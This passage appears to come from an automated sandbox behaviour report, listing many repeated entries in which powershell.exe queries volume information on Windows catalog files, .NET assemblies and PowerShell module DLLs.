Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
